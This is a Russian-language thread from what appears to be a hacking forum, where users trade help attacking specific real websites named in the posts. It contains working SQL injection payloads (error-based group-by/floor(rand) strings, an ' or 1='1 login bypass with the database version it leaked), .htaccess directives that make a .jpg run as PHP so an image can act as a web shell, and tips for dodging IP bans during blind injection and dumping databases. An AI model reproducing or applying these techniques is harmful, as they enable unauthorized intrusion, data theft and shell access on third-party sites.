У него не метод, а вероятная возможность. Условие очень жесткое, что бы результат запроса в базу, в котором есть уязвимость, участвовал в другом запросе. На практике такое встречается не так часто как хотелось бы.
to GroM88 Нашел пост Scipio http://forum.antichat.ru/showpost.php?p=663815&postcount=39 попробуй. Мне, к сожалению, не подходит...
можно что-то сделать с инъекцией в лимит? К примеру, типа этого www.e-tobaccos.com/buy-cigars/advanced_search_result.php?amp;currency=USD&language=en&manufacturers_id=20&operator=or&sort=@@D4d
есть Блинд инъекция, но сайт банит за частые попытки подключения. Вообщем как можно слить БД еще?) найти лог и пасс от чего то и залить шел? или что моно сделать? Сори но я нуп в этом пока что. заранее спасибо
Кто подскажет как сделать картинку-шелл, т.е foto.jpg/.php думаю вы поняли про какой баг я имею ввиду, просто так если тупо код шелла втыкивать в картинку, то картинка перестаёт работать
пробуй так PHP: AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg или так PHP: <Files "foto.jpg"> AddType application/x-httpd-php .jpg </Files>
/?id=%40%40g3YlL&strana=content как правильно вывести базу данных??sql map ниче не выводит.mysql сервер
Увеличить таймаут между запросами. З.Ы. На глупые вопросы - глупые ответы. З.Ы.Ы. Всё зависит от ситуации и куууууучи факторов.
помогите, тут есть инъекция Code: http://sdelanounas.ru/blogs/all/?page=-1 если есть то как раскрутить + ещё Code: http://sdelanounas.ru/blogs/21928/?pid=-185629
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8 Тут инъекция в LIMIT C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое? Code: http://www.sdelanounas.ru/index/loginPage/ Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку: Code: SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1 Пробовал в Haviji POST запросом, ничего не вышло.
Подозреваю что тут инъекция точно присутствует. Во всяком случае при использовании ' or 1='1 сервер не ругался. Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".
Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?
не получилось у меня в ручную ничего сделать, знаний не хватает. Может кто поможет, мне даже не важен хеш админа, но очень нужно раскрытие полного пути к скрипту.
login=' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))# password=1 Duplicate entry '5.0.51a-24+lenny5-log' for key 1
